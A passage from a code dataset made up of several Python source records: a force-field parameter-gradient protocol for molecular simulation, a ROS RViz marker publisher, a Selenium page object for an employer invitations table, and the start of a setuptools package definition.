default_value=UNDEFINED\n    )\n    thermodynamic_state = protocol_input(\n        docstring='The thermodynamic state to estimate the gradients at.',\n        type_hint=ThermodynamicState,\n        default_value=UNDEFINED\n    )\n\n    coordinate_file_path = protocol_input(\n        docstring='A path to a PDB coordinate file which describes the topology of '\n                  'the system.',\n        type_hint=str,\n        default_value=UNDEFINED\n    )\n    trajectory_file_path = protocol_input(\n        docstring='A path to the trajectory of configurations.',\n        type_hint=str,\n        default_value=UNDEFINED\n    )\n\n    parameter_key = protocol_input(\n        docstring='The key of the parameter to differentiate with respect to.',\n        type_hint=ParameterGradientKey,\n        default_value=UNDEFINED\n    )\n\n    perturbation_scale = protocol_input(\n        docstring='The amount to perturb the parameter by, such that '\n                  'p_new = p_old * (1 +/- `perturbation_scale`)',\n        type_hint=float,\n        default_value=1.0e-4\n    )\n\n    use_subset_of_force_field = protocol_input(\n        docstring='If true, the reduced potential will be estimated using '\n                  'an OpenMM system which only contains the parameter of '\n                  'interest.',\n        type_hint=bool,\n        default_value=True\n    )\n\n    effective_sample_indices = protocol_input(\n        docstring='This is a placeholder input which is not currently implemented.',\n        type_hint=list,\n        default_value=UNDEFINED,\n        optional=True\n    )\n\n    reference_potential_paths = protocol_output(\n        docstring='File paths to the reduced potentials evaluated using each '\n                  'of the reference force fields.',\n        type_hint=list\n    )\n    reverse_potentials_path = protocol_output(\n        docstring='A file path to the energies evaluated using the parameters '\n                  'perturbed in the reverse direction.',\n        type_hint=str\n    )\n    forward_potentials_path = protocol_output(\n        docstring='A file path to the energies evaluated using the parameters '\n                  'perturbed in the forward direction.',\n        type_hint=str\n    )\n\n    reverse_parameter_value = protocol_output(\n        docstring='The value of the parameter perturbed in the reverse '\n                  'direction.',\n        type_hint=unit.Quantity\n    )\n    forward_parameter_value = protocol_output(\n        docstring='The value of the parameter perturbed in the forward '\n                  'direction.',\n        type_hint=unit.Quantity\n    )\n\n    def _build_reduced_system(self, original_force_field, topology, scale_amount=None):\n        \"\"\"Produces an OpenMM system containing only forces for the specified parameter,\n        optionally perturbed by the amount 
specified by `scale_amount`.\n\n Parameters\n ----------\n original_force_field: openforcefield.typing.engines.smirnoff.ForceField\n The force field to create the system from (and optionally perturb).\n topology: openforcefield.topology.Topology\n The topology of the system to apply the force field to.\n scale_amount: float, optional\n The optional amount to perturb the parameter by.\n\n Returns\n -------\n simtk.openmm.System\n The created system.\n simtk.unit.Quantity\n The new value of the perturbed parameter.\n \"\"\"\n # As this method deals mainly with the toolkit, we stick to\n # simtk units here.\n from openforcefield.typing.engines.smirnoff import ForceField\n\n parameter_tag = self.parameter_key.tag\n parameter_smirks = self.parameter_key.smirks\n parameter_attribute = self.parameter_key.attribute\n\n original_handler = original_force_field.get_parameter_handler(parameter_tag)\n original_parameter = original_handler.parameters[parameter_smirks]\n\n if self.use_subset_of_force_field:\n\n force_field = ForceField()\n handler = copy.deepcopy(original_force_field.get_parameter_handler(parameter_tag))\n force_field.register_parameter_handler(handler)\n\n else:\n\n force_field = copy.deepcopy(original_force_field)\n handler = force_field.get_parameter_handler(parameter_tag)\n\n parameter_index = None\n value_list = None\n\n if hasattr(original_parameter, parameter_attribute):\n parameter_value = getattr(original_parameter, parameter_attribute)\n else:\n attribute_split = re.split(r'(\\d+)', parameter_attribute)\n\n assert len(parameter_attribute) == 2\n assert hasattr(original_parameter, attribute_split[0])\n\n parameter_attribute = attribute_split[0]\n parameter_index = int(attribute_split[1]) - 1\n\n value_list = getattr(original_parameter, parameter_attribute)\n parameter_value = value_list[parameter_index]\n\n if scale_amount is not None:\n\n existing_parameter = handler.parameters[parameter_smirks]\n\n if np.isclose(parameter_value.value_in_unit(parameter_value.unit), 0.0):\n # Careful thought needs to be given to this. 
Consider cases such as\n # epsilon or sigma where negative values are not allowed.\n parameter_value = (scale_amount if scale_amount > 0.0 else 0.0) * parameter_value.unit\n else:\n parameter_value *= (1.0 + scale_amount)\n\n if value_list is None:\n setattr(existing_parameter, parameter_attribute, parameter_value)\n else:\n value_list[parameter_index] = parameter_value\n setattr(existing_parameter, parameter_attribute, value_list)\n\n system = force_field.create_openmm_system(topology)\n\n if not self.enable_pbc:\n disable_pbc(system)\n\n return system, parameter_value\n\n def _evaluate_reduced_potential(self, system, trajectory, file_path,\n compute_resources, subset_energy_corrections=None):\n \"\"\"Return the potential energy.\n Parameters\n ----------\n system: simtk.openmm.System\n The system which encodes the interaction forces for the\n specified parameter.\n trajectory: mdtraj.Trajectory\n A trajectory of configurations to evaluate.\n file_path: str\n The path to save the reduced potentials to.\n compute_resources: ComputeResources\n The compute resources available to execute on.\n subset_energy_corrections: unit.Quantity, optional\n A unit.Quantity wrapped numpy.ndarray which contains a set\n of energies to add to the re-evaluated potential energies.\n This is mainly used to correct the potential energies evaluated\n using a subset of the force field back to energies as if evaluated\n using the full thing.\n\n Returns\n ---------\n propertyestimator.unit.Quantity\n A unit bearing `np.ndarray` which contains the reduced potential.\n PropertyEstimatorException, optional\n Any exceptions that were raised.\n \"\"\"\n from simtk import unit as simtk_unit\n\n integrator = openmm.VerletIntegrator(0.1 * simtk_unit.femtoseconds)\n\n platform = setup_platform_with_resources(compute_resources, True)\n openmm_context = openmm.Context(system, integrator, platform)\n\n potentials = np.zeros(trajectory.n_frames, dtype=np.float64)\n reduced_potentials = np.zeros(trajectory.n_frames, dtype=np.float64)\n\n temperature = pint_quantity_to_openmm(self.thermodynamic_state.temperature)\n beta = 1.0 / (simtk_unit.BOLTZMANN_CONSTANT_kB * temperature)\n\n pressure = pint_quantity_to_openmm(self.thermodynamic_state.pressure)\n\n for frame_index in range(trajectory.n_frames):\n\n positions = trajectory.xyz[frame_index]\n box_vectors = trajectory.openmm_boxes(frame_index)\n\n if self.enable_pbc:\n openmm_context.setPeriodicBoxVectors(*box_vectors)\n\n openmm_context.setPositions(positions)\n\n state = openmm_context.getState(getEnergy=True)\n\n unreduced_potential = state.getPotentialEnergy() / simtk_unit.AVOGADRO_CONSTANT_NA\n\n if pressure is not None and self.enable_pbc:\n unreduced_potential += pressure * state.getPeriodicBoxVolume()\n\n potentials[frame_index] = state.getPotentialEnergy().value_in_unit(simtk_unit.kilojoule_per_mole)\n reduced_potentials[frame_index] = unreduced_potential * beta\n\n potentials *= unit.kilojoule / unit.mole\n reduced_potentials *= unit.dimensionless\n\n if subset_energy_corrections is not None:\n potentials += subset_energy_corrections\n\n statistics_array = StatisticsArray()\n statistics_array[ObservableType.ReducedPotential] = reduced_potentials\n statistics_array[ObservableType.PotentialEnergy] = potentials\n statistics_array.to_pandas_csv(file_path)\n\n def execute(self, directory, available_resources):\n\n import mdtraj\n\n from openforcefield.topology import Molecule, Topology\n\n logging.info(f'Calculating the reduced gradient potentials for {self.parameter_key}: 
{self._id}')\n\n if len(self.reference_force_field_paths) != 1 and self.use_subset_of_force_field:\n\n return PropertyEstimatorException(directory, 'A single reference force field must be '\n 'provided when calculating the reduced '\n 'potentials using a subset of the full force')\n\n if len(self.reference_statistics_path) <= 0 and self.use_subset_of_force_field:\n\n return PropertyEstimatorException(directory, 'The path to the statistics evaluated using '\n 'the full force field must be provided.')\n\n with open(self.force_field_path) as file:\n target_force_field_source = ForceFieldSource.parse_json(file.read())\n\n if not isinstance(target_force_field_source, SmirnoffForceFieldSource):\n\n return PropertyEstimatorException(directory, 'Only SMIRNOFF force fields are supported by '\n 'this protocol.')\n\n target_force_field = target_force_field_source.to_force_field()\n\n trajectory = mdtraj.load_dcd(self.trajectory_file_path,\n self.coordinate_file_path)\n\n unique_molecules = []\n\n for component in self.substance.components:\n\n molecule = Molecule.from_smiles(smiles=component.smiles)\n unique_molecules.append(molecule)\n\n pdb_file = app.PDBFile(self.coordinate_file_path)\n topology = Topology.from_openmm(pdb_file.topology, unique_molecules=unique_molecules)\n\n # If we are using only a subset of the system object, load in the reference\n # statistics containing the full system energies to correct the output\n # forward and reverse potential energies.\n reference_statistics = None\n subset_energy_corrections = None\n\n if self.use_subset_of_force_field:\n reference_statistics = StatisticsArray.from_pandas_csv(self.reference_statistics_path)\n\n # Compute the reduced reference energy if any reference force field files\n # have been provided.\n self.reference_potential_paths = []\n\n for index, reference_force_field_path in enumerate(self.reference_force_field_paths):\n\n with open(reference_force_field_path) as file:\n reference_force_field_source = ForceFieldSource.parse_json(file.read())\n\n if not isinstance(reference_force_field_source, SmirnoffForceFieldSource):\n return PropertyEstimatorException(directory, 'Only SMIRNOFF force fields are supported by '\n 'this protocol.')\n\n reference_force_field = reference_force_field_source.to_force_field()\n reference_system, _ = self._build_reduced_system(reference_force_field, topology)\n\n reference_potentials_path = path.join(directory, f'reference_{index}.csv')\n\n self._evaluate_reduced_potential(reference_system, trajectory,\n reference_potentials_path,\n available_resources)\n\n self.reference_potential_paths.append(reference_potentials_path)\n\n if reference_statistics is not None:\n\n subset_energies = StatisticsArray.from_pandas_csv(reference_potentials_path)\n subset_energy_corrections = (reference_statistics[ObservableType.PotentialEnergy] -\n subset_energies[ObservableType.PotentialEnergy])\n\n subset_energies[ObservableType.PotentialEnergy] = reference_statistics[ObservableType.PotentialEnergy]\n subset_energies.to_pandas_csv(reference_potentials_path)\n\n # Build the slightly perturbed system.\n reverse_system, reverse_parameter_value = self._build_reduced_system(target_force_field,\n topology,\n -self.perturbation_scale)\n\n forward_system, forward_parameter_value = self._build_reduced_system(target_force_field,\n topology,\n self.perturbation_scale)\n\n self.reverse_parameter_value = openmm_quantity_to_pint(reverse_parameter_value)\n self.forward_parameter_value = openmm_quantity_to_pint(forward_parameter_value)\n\n # 
Calculate the reduced potentials.\n        self.reverse_potentials_path = path.join(directory, 'reverse.csv')\n        self.forward_potentials_path = path.join(directory, 'forward.csv')\n\n        self._evaluate_reduced_potential(reverse_system, trajectory, self.reverse_potentials_path,\n                                         available_resources, subset_energy_corrections)\n        self._evaluate_reduced_potential(forward_system, trajectory, self.forward_potentials_path,\n                                         available_resources, subset_energy_corrections)\n\n        logging.info(f'Finished calculating the reduced gradient potentials.')\n\n        return self._get_output_dictionary()\n\n\n@register_calculation_protocol()\nclass CentralDifferenceGradient(BaseProtocol):\n    \"\"\"A protocol which employs the central difference method\n    to estimate the gradient of an observable A, such that\n\n    grad = (A(x+h) - A(x-h)) / (2h)\n\n    Notes\n    -----\n    The reverse and forward observables may be passed either as unit.Quantity\n    or EstimatedQuantity values; EstimatedQuantity inputs are unwrapped to\n    their underlying value before differencing.\n    \"\"\"\n\n    parameter_key = protocol_input(\n        docstring='The key of the parameter to differentiate with respect to.',\n        type_hint=ParameterGradientKey,\n        default_value=UNDEFINED\n    )\n\n    reverse_observable_value = protocol_input(\n        docstring='The value of the observable evaluated using the parameters '\n                  'perturbed in the reverse direction.',\n        type_hint=typing.Union[unit.Quantity, EstimatedQuantity],\n        default_value=UNDEFINED\n    )\n    forward_observable_value = protocol_input(\n        docstring='The value of the observable evaluated using the parameters '\n                  'perturbed in the forward direction.',\n        type_hint=typing.Union[unit.Quantity, EstimatedQuantity],\n        default_value=UNDEFINED\n    )\n\n    reverse_parameter_value = protocol_input(\n        docstring='The value of the parameter perturbed in the reverse '\n                  'direction.',\n        type_hint=unit.Quantity,\n        default_value=UNDEFINED\n    )\n    forward_parameter_value = protocol_input(\n        docstring='The value of the parameter perturbed in the forward '\n                  'direction.',\n        type_hint=unit.Quantity,\n        default_value=UNDEFINED\n    )\n\n    gradient = protocol_output(\n        docstring='The estimated gradient.',\n        type_hint=ParameterGradient\n    )\n\n    def execute(self, directory, available_resources):\n\n        if self.forward_parameter_value < self.reverse_parameter_value:\n\n            return PropertyEstimatorException(f'The forward parameter value ({self.forward_parameter_value}) must '\n                                              f'be larger than the reverse value ({self.reverse_parameter_value}).')\n\n        reverse_value = self.reverse_observable_value\n        forward_value = self.forward_observable_value\n\n        if isinstance(reverse_value, EstimatedQuantity):\n            reverse_value = reverse_value.value\n\n        if isinstance(forward_value, EstimatedQuantity):\n            forward_value = forward_value.value\n\n        gradient = ((forward_value - reverse_value) /\n                    (self.forward_parameter_value - self.reverse_parameter_value))\n\n        self.gradient = ParameterGradient(self.parameter_key, gradient)\n\n        return self._get_output_dictionary()\n","sub_path":"propertyestimator/protocols/gradients.py","file_name":"gradients.py","file_ext":"py","file_size_in_byte":20252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"189273290","text":"#!/usr/bin/env python\n\nimport rospy\nfrom visualization_msgs.msg import Marker\n\n\ndef mark_location(x, y, mark_id):\n    shape = Marker.CUBE\n    pub = rospy.Publisher('visualization_marker', Marker, queue_size=100)\n    rospy.init_node('map_marker', anonymous=True)\n    rate = rospy.Rate(10) # 10hz\n    \n    marker = Marker()\n    
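# Note (editor's addition): the frame_id set below must name a frame that\n    # exists in the TF tree / matches RViz's fixed frame (commonly \"map\"),\n    # otherwise RViz will not display the marker.\n    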
marker.header.frame_id = \"/map\"\n marker.header.stamp = rospy.Time.now()\n\n\n marker.ns = \"basic_shapes\"\n marker.id = mark_id\n\n\n marker.type = shape\n\n\n marker.action = Marker.ADD\n\n\n marker.pose.position.x = x\n marker.pose.position.y = y\n marker.pose.position.z = 0\n marker.pose.orientation.x = 0.0\n marker.pose.orientation.y = 0.0\n marker.pose.orientation.z = 0.0\n marker.pose.orientation.w = 1.0\n\n\n marker.scale.x = 0.5\n marker.scale.y = 0.5\n marker.scale.z = 0.5\n\n\n marker.color.r = 0.0\n marker.color.g = 1.0\n marker.color.b = 0.0\n marker.color.a = 1.0\n\n marker.lifetime = rospy.Duration()\n\n\n rospy.loginfo(marker)\n rate.sleep()\n while not rospy.is_shutdown():\n pub.publish(marker)\n rate.sleep()\n\n\nif __name__ == \"__main__\":\n mark_location(6, 2, 3)\n\n","sub_path":"src/map_markers/src/marker_py.py","file_name":"marker_py.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"329940314","text":"# coding: utf-8\nfrom selenium.common.exceptions import (NoSuchElementException,\n\tStaleElementReferenceException, TimeoutException)\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom page import Page\nfrom components import menu\nfrom components import header\nimport main\nimport time\nfrom selenium.webdriver.support.wait import WebDriverWait as WDW\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\n\n# Employer functionality: Table showing pending invitations\n\nclass InvitationsPage(Page):\n\turl_tail = 'invitations'\n\tdynamic = False\n\n\tdef load(self):\n\t\ttry:\n\t\t\tWDW(self.driver, 10).until(EC.presence_of_element_located((By.CLASS_NAME, 'table_toolbar')))\n\t\t\tself.load_body()\n\t\t\tself.header = header.PrivateHeader(self.driver)\n\t\t\tself.menu = menu.SideMenu(self.driver, True)\n\t\t\treturn True\n\t\texcept (NoSuchElementException, StaleElementReferenceException,\n\t\t\tIndexError, AttributeError) as e:\n\t\t\tprint('exception loading invitations page!')\n\t\t\treturn False\n\n\tdef load_body(self):\n\t\tself.empty_msg = self.try_load_empty_msg()\n\t\tself.load_toolbar()\n\t\ttime.sleep(.4)\n\t\tself.load_table()\n\n\tdef try_load_empty_msg(self):\n\t\ttry:\n\t\t\treturn self.driver.find_element_by_class_name('noneMessage')\n\t\texcept NoSuchElementException:\n\t\t\treturn None\n\n\tdef load_toolbar(self):\n\t\t# universal toolbar options\n\t\tself.toolbar = self.driver.find_element_by_class_name('table_toolbar')\n\t\tself.info_icon = self.toolbar.find_element_by_tag_name('svg')\n\t\tself.info_span = self.try_load_info_span()\n\n\t\tbg_color = self.toolbar.value_of_css_property('background-color')\n\t\tdefault_color = 'rgba(0, 0, 0'\n\t\t# default_color = 'rgba(0, 0, 0, 0.12)'\n\t\tfind_by = self.toolbar.find_elements_by_tag_name\n\t\tif default_color in bg_color:\n\t\t\t# default toolbar options\n\t\t\tself.add_button = self.toolbar.find_element_by_class_name('send_invitation')\n\t\t\t# selected toolbar options\n\t\t\tself.resend_button = None\n\t\t\tself.delete_button = None\n\t\t\tself.selected_str = None\n\t\telse:\n\t\t\t# default toolbar options\n\t\t\tself.add_button = None\n\t\t\t# selected toolbar options\n\t\t\tself.resend_button = find_by('button')[0]\n\t\t\tself.delete_button = find_by('button')[1]\n\t\t\tself.selected_str = find_by('span')[0]\n\n\tdef try_load_info_span(self):\n\t\ttry:\n\t\t\treturn 
self.toolbar.find_elements_by_tag_name('span')[1]\n\t\texcept (NoSuchElementException, IndexError) as e:\n\t\t\treturn None\n\n\tdef load_table(self):\n\t\t# only get table header on desktop\n\t\tif main.is_desktop():\n\t\t\tself.load_table_header()\n\t\tself.load_table_body()\n\t\tself.load_table_footer()\n\n\tdef load_table_header(self):\n\t\t# Should only get called on desktop\n\t\ttry:\n\t\t\tself.table = self.driver.find_element_by_tag_name('table')\n\t\t\tself.table_header = self.table.find_element_by_tag_name('thead')\n\t\t\tself.header_cols = self.table_header.find_elements_by_tag_name('th')\n\t\t\tself.select_all = (\n\t\t\t\tself.table_header.find_element_by_tag_name('input'))\n\t\texcept (NoSuchElementException, IndexError) as e:\n\t\t\t# No invitations (or on wrong page)\n\t\t\tself.table = None\n\t\t\tself.table_header = None\n\t\t\tself.select_all = None\n\n\tdef load_table_body(self):\n\t\tif self.table_is_empty():\n\t\t\t# No invitations (or on wrong page)\n\t\t\tself.table_body = None\n\t\t\tself.invitations = None\n\t\telif main.is_desktop():\n\t\t\t# Seems possible to think there's no 'empty_msg' when table is\n\t\t\tself.table_body = self.table.find_element_by_tag_name('tbody')\n\t\t\tself.invitations = self.table_body.find_elements_by_tag_name('tr')\n\t\telse:\n\t\t\tself.table_body = None\n\t\t\tself.invitations = self.driver.find_elements_by_class_name('table_entry')\n\n\tdef load_table_footer(self):\n\t\tself.table_footer = self.try_load_footer()\n\t\tif self.has_footer():\n\t\t\tself.footer_buttons = self.try_load_footer_buttons()\n\t\t\tself.first_page_button = self.try_load_first_page_but()\n\t\t\tself.last_page_button = self.try_load_last_page_but()\n\n\tdef try_load_footer(self):\n\t\ttry:\n\t\t\treturn self.driver.find_element_by_id('table_footer')\n\t\texcept NoSuchElementException:\n\t\t\treturn None\n\n\tdef try_load_footer_buttons(self):\n\t\ttry:\n\t\t\treturn self.table_footer.find_elements_by_tag_name('button')\n\t\texcept NoSuchElementException:\n\t\t\treturn None\n\n\tdef try_load_first_page_but(self):\n\t\ttry:\n\t\t\treturn self.table_footer.find_element_by_class_name('first_page')\n\t\texcept NoSuchElementException:\n\t\t\treturn None\n\n\tdef try_load_last_page_but(self):\n\t\ttry:\n\t\t\treturn self.table_footer.find_element_by_class_name('last_page')\n\t\texcept NoSuchElementException:\n\t\t\treturn None\n\n###################### General table info ###############################\n\n\tdef table_is_empty(self):\n\t\treturn self.empty_msg is not None\n\n\tdef is_info_showing(self):\n\t\t\"\"\"Is information span showing?\"\"\"\n\t\treturn True if (self.info_span is not None) else False\n\n\tdef num_invitations(self):\n\t\tif self.invitations is not None:\n\t\t\treturn len(self.invitations)\n\n\tdef table_state(self):\n\t\tbg_color = self.toolbar.value_of_css_property('background-color')\n\t\tselected_color = 'rgba(56, 217, 244'\n\t\t# color returned by browser can vary. 
Don't check for exact match\n\t\tif selected_color in bg_color:\n\t\t\t# table has at least 1 invitation selected\n\t\t\treturn 'selected'\n\t\treturn 'default'\n\n\tdef all_selected(self):\n\t\treturn self.select_all.is_selected()\n\n\tdef get_num_selected(self):\n\t\t\"\"\"Return # of selected invitations according to self.selected_str\"\"\"\n\t\tif self.table_state() == 'selected':\n\t\t\treturn self.selected_str[:-9] # 2 selected\n\t\treturn 0\n\n\tdef get_mobile_row_index(self, row_index):\n\t # Want to ignore text at beginning of each 'table_entry_row'\n\t # Given row_index, return starting index for each row\n\n\t # name, employee id, phone number, email, date invited\n\t indexes = [6, 13, 14, 7, 14]\n\t return indexes[row_index]\n\n\tdef get_invitation_info(self, table_entry):\n\t \"\"\"Given invitation entry parse out info\"\"\"\n\t el_input = table_entry.find_element_by_tag_name('input')\n\t if main.is_desktop():\n\t # DESKTOP: get info out of each column\n\t tds = table_entry.find_elements_by_tag_name('td')\n\t info = {\n\t 'selected': el_input.is_selected(),\n\t 'name': tds[1].text,\n\t 'id': tds[2].text,\n\t 'phone': tds[3].text,\n\t 'email': tds[4].text,\n\t 'date': tds[5].text\n\t }\n\t else:\n\t # MOBILE: get info out of each row\n\t rows = table_entry.find_elements_by_class_name('table_entry_row')\n\n\t info = {\n\t 'selected': el_input.is_selected(),\n\t 'name': rows[0].text[6:],\n\t 'id': rows[1].text[13:],\n\t 'phone': rows[2].text[14:],\n\t 'email': rows[3].text[7:],\n\t 'date': rows[4].text[14:]\n\t }\n\t # print(str(info))\n\t return info\n\n\tdef get_table_entry(self, find_by, identifier):\n\t # find_by: 'index' or name of column header\n\t # identifier: index of invitation or string we try to match in col[find_by]\n\t if self.empty_msg is None:\n\t table_entry = None\n\t if find_by == 'index':\n\t return self.invitations[identifier]\n\t elif main.is_desktop():\n\t # Given find_by, get right column.\n\t # Return entry w/ data in col that matches identifier\n\t column_index = self.get_column_index(find_by)\n\t for i, invitation in enumerate(self.invitations):\n\t tds = invitation.find_elements_by_tag_name('td')\n\t if tds[column_index].text == identifier:\n\t table_entry = self.invitations[i]\n\t else:\n\t # Given find_by, get right row.\n\t # Return entry w/ data in row that matches identifier\n\t row_index = self.get_row_index(find_by)\n\t for i, invitation in enumerate(self.invitations):\n\t rows = invitation.find_elements_by_class_name('table_entry_row')\n\t index = self.get_mobile_row_index(row_index)\n\t if rows[row_index].text[index:].lower() == identifier.lower():\n\t table_entry = self.invitations[i]\n\n\t if table_entry is not None:\n\t return table_entry\n\t return None # no invitations or couldn't find w/ given info\n\n\tdef get_column_index(self, column_text):\n\t # Desktop: return index of column that matches given text\n\t for i, column in enumerate(self.header_cols):\n\t if column_text.lower() == column.text.lower():\n\t return i\n\t msg = str(column_text) + \" is not a column header (Invitations)\"\n\t raise Exception(msg)\n\n\tdef get_row_index(self, row_text):\n\t # Mobile: return index of row that matches given text\n\t rows = ['name', 'employee id', 'phone number', 'email', 'date invited']\n\t for i, row in enumerate(rows):\n\t if row_text.lower() == rows[i].lower():\n\t return i\n\t msg = str(row_text) + \" is not a row header (Invitations)\"\n\t raise Exception(msg)\n\n\tdef get_invitation(self, find_by, identifier, info=True):\n\t invitation = 
self.get_table_entry(find_by, identifier)\n\t if invitation is not None and info:\n\t return self.get_invitation_info(invitation)\n\t return invitation\n\n\tdef click_invitation(self, find_by, identifier):\n\t \tinvitation = self.get_table_entry(find_by, identifier)\n\t \tif(main.is_desktop() is False):\n\t \t\trow = invitation.find_element_by_class_name('table_entry_row')\n\t \telse:\n\t \t\trow = invitation.find_elements_by_tag_name('td')[1]\n\n\t \tself.move_to_el(row)\n\t \t# should be on invitationCard\n\n\n\t############################# Functionality #################################\n\n\tdef toggle_info(self):\n\t\tself.info_icon.click()\n\t\ttime.sleep(.4)\n\t\tself.load()\n\n\tdef toggle_all(self):\n\t\tself.select_all.click()\n\t\tself.load()\n\n\tdef toggle_invitation(self, find_by='index', identifier=0):\n\t\tself.click_toast()\n\t\tinvitation = self.get_table_entry(find_by, identifier)\n\t\tif invitation is not None:\n\t\t\tcheckbox = invitation.find_element_by_tag_name('input')\n\t\t\tif not checkbox.is_selected():\n\t\t\t\tself.move_to_el(checkbox)\n\t\t\t\treturn self.load()\n\t\telse:\n\t\t\tprint('failed to find invitation by ' + str(find_by) + ', ' + str(identifier))\n\t\t\treturn False\n\n\tdef resend_invitations(self):\n\t\t# resend currently selected invitations\n\t\tif self.table_state() == 'selected':\n\t\t\tself.scroll_to_top()\n\t\t\tself.resend_button.click()\n\t\t\ttry:\n\t\t\t\tWDW(self.driver, 3).until(\n\t\t\t\t\tEC.presence_of_element_located((By.CLASS_NAME, 'snackbar')))\n\t\t\texcept TimeoutException:\n\t\t\t\traise Exception(\"Resent invitations but could not find snackbar\")\n\t\t\treturn self.load()\n\t\treturn False\n\n\tdef resend_all_invitations(self):\n\t\t# resend all invitations\n\t\tif not self.all_selected():\n\t\t\tself.toggle_all()\n\t\treturn self.resend_invitations()\n\n\tdef delete_invitations(self):\n\t\t# delete currently selected invitations\n\t\tif self.table_state() == 'selected':\n\t\t\tself.scroll_to_top()\n\t\t\tself.delete_button.click()\n\t\t\ttime.sleep(.4)\n\t\t\treturn self.load()\n\t\treturn False\n\n\tdef delete_all_invitations(self):\n\t\t# delete all invitations\n\t\tif not self.all_selected():\n\t\t\tself.toggle_all()\n\t\treturn self.delete_invitations()\n\n\tdef add_invitation(self):\n\t\tif self.table_state() == 'default':\n\t\t\tself.add_button.click()\n\n############################### Toast Functions ###############################\n\n\tdef get_secret_urls(self):\n\t\tWDW(self.driver, 10).until(EC.presence_of_element_located((By.ID, 'testSnackId')))\n\t\t#time.sleep(1)\n\t\tself.load()\n\t\telem = self.driver.find_elements_by_class_name(\"sm-secret-code\")\n\t\ttry:\n\t\t\temail_string = elem[0].text\n\t\t\ttry:\n\t\t\t\temail_url = email_string[0:email_string.index(' => ')]\n\t\t\texcept ValueError:\n\t\t\t\tpass\n\t\t\temail = email_string[email_string.index('email:') + 6:]\n\t\texcept NoSuchElementException:\n\t\t\temail = None\n\t\t\temail_url = None\n\t\ttry:\n\t\t\tphone_string = elem[1].text\n\t\t\tphone = phone_string[phone_string.index('phone:') + 6:]\n\t\t\tphone_url = phone_string[0:phone_string.index(' => ')]\n\t\texcept IndexError:\n\t\t\tphone = None\n\t\t\tphone_url = None\n\t\treturn {'email': email, 'phone': phone, 'email_url': email_url,\n\t\t\t'phone_url': phone_url}\n\n\tdef click_toast(self):\n\t\tif self.has_toast():\n\t\t\tself.toast.click()\n\t\t\ttime.sleep(.4)\n\n\tdef has_toast(self):\n\t\t# is toast visible on page?\n\t\ttry:\n\t\t\tself.toast = 
self.driver.find_element_by_id('testSnackId')\n\t\t\treturn True\n\t\texcept NoSuchElementException:\n\t\t\treturn False\n\n\t############################### Footer Functions ##############################\n\n\tdef has_footer(self):\n\t\treturn self.table_footer is not None\n\n\tdef num_footer_buttons(self):\n\t\tif self.has_footer():\n\t\t\treturn len(self.footer_buttons)\n\n\tdef index_of_current_page(self):\n\t\t# return index of disabled footer button\n\t\tif self.has_footer():\n\t\t\tfor i, button in enumerate(self.footer_buttons):\n\t\t\t\tif not button.is_enabled():\n\t\t\t\t\treturn i\n\n\tdef current_page(self):\n\t\tif self.has_footer():\n\t\t\tcur_index = self.index_of_current_page()\n\t\t\treturn int(self.footer_buttons[cur_index].text)\n\t\telse:\n\t\t\treturn 1\n\n\tdef go_to_page(self, page):\n\t\t# Go to 'first', 'last', or {int} page. Return whether reloading page\n\t\tif self.has_footer():\n\t\t\tnew_page = True\n\t\t\tif type(page) is int and page != self.current_page():\n\t\t\t\tnew_page = self.go_to_page_number(page)\n\t\t\telif page == 'first' and self.first_page_button is not None:\n\t\t\t\tself.scroll_to_bottom()\n\t\t\t\tself.first_page_button.click()\n\t\t\telif page == 'last' and self.last_page_button is not None:\n\t\t\t\tself.scroll_to_bottom()\n\t\t\t\tself.last_page_button.click()\n\t\t\telse:\n\t\t\t\tnew_page = False\n\t\t\tif new_page:\n\t\t\t\ttime.sleep(1)\n\t\t\t\treturn self.load()\n\t\treturn False\n\n\tdef go_to_page_number(self, page):\n\t\t# Given page#, return whether possible to go to new page or not\n\n\t\t# Can navigate to First/Last by passing in int(page) of first/last page\n\t\tfor i, button in enumerate(self.footer_buttons):\n\t\t\ttext = button.text\n\t\t\tif text == str(page):\n\t\t\t\tself.scroll_to_bottom()\n\t\t\t\tbutton.click()\n\t\t\t\ttime.sleep(1)\n\t\t\t\treturn self.load()\n\t\treturn False\n\n\tdef next_page(self):\n\t\t# Go to next page and reload. Return False if on last page\n\t\tcurrent_index = self.index_of_current_page()\n\t\t# raw_input('current_index: ' + str(current_index))\n\t\tlast_index = len(self.footer_buttons) - 1\n\t\t# raw_input('last_index: ' + str(last_index))\n\t\tif current_index < last_index:\n\t\t\tself.scroll_to_bottom()\n\t\t\tself.footer_buttons[current_index + 1].click()\n\t\t\ttime.sleep(1)\n\t\t\treturn self.load()\n\t\treturn False\n\n\tdef previous_page(self):\n\t\t# Go to previous page and reload. 
Return false if on 1st page\n\t\tcurrent_index = self.index_of_current_page()\n\t\tif current_index != 0:\n\t\t\tself.scroll_to_bottom()\n\t\t\tself.footer_buttons[current_index - 1].click()\n\t\t\ttime.sleep(1)\n\t\t\treturn self.load()\n\t\treturn False\n","sub_path":"testing/pages/invitations.py","file_name":"invitations.py","file_ext":"py","file_size_in_byte":14218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"305006136","text":"\"\"\"Setuptools package definition\"\"\"\n\nfrom setuptools import setup\n\n\nwith open('README.rst', 'r') as f:\n README_TEXT = f.read()\n\nsetup(\n name = \"finja\",\n version = \"1.0.4\",\n py_modules = [\"finja\"],\n entry_points = {\n 'console_scripts': [\n \"finja=finja:main\",\n \"finjacol=finja:col_main\",\n \"finjadup=finja:dup_main\"\n ]\n },\n install_requires = [\n \"binaryornot\",\n \"six\",\n \"chardet\",\n \"argparse\",\n ],\n author = \"David Vogt, Jean-Louis Fuchs\",\n author_email = \"dv@winged.ch, ganwell@fangorn.ch\",\n description = (\n \"Index stuff and find it fast and without bloat\"\n ),\n long_description = README_TEXT,\n keywords = \"code index find text open\",\n url = \"https://ganwell.github.io\",\n classifiers = [\n \"Development Status :: 5 - Production/Stable\",\n \"Environment :: Console\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Information Technology\",\n \"License :: OSI Approved :: \"\n \"GNU Affero General Public License v3\",\n \"Natural Language :: English\",\n \"Operating System :: OS Independent\",\n \"Programming 